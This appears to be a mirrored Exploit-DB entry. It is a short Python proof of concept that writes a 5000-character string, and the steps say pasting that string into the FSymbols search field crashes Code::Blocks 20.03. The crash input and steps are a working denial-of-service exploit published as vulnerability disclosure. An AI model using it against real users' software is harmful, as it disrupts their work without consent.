exploit-db-mirror/exploits/windows/dos/48617.py
Offensive Security b8629afe42 DB: 2020-06-24
4 changes to exploits/shellcodes

Code Blocks 20.03 - Denial Of Service (PoC)

Lansweeper 7.2 - Incorrect Access Control
Responsive Online Blog 1.0 - 'id' SQL Injection
Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
2020-06-24 05:01:53 +00:00

34 lines
No EOL
1.1 KiB
Python
Executable file

# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-23
# Vulnerable Software: Code Blocks
# Version: 20.03
# Vulnerability Type: Denial of Service (DoS)
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: CodeBlocksCrash.py
# 2.- Copy content to clipboard
# 3.- Open "codeblocks.exe"
# 4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
# 5.- Select "Active project's symbols" from drop down "View:" menu.
# 6.- Paste ClipBoard into the "Search:" field.
# 7.- Press Enter from keyboard.
# 8.- Crashed.
##################################################################################################################################################
#Python "CodeBlocksCrash.py" Code:
f= open("CodeBlocksCrash.txt", "w")
payload="\x41" * 5000
f.write(payload)
f.close()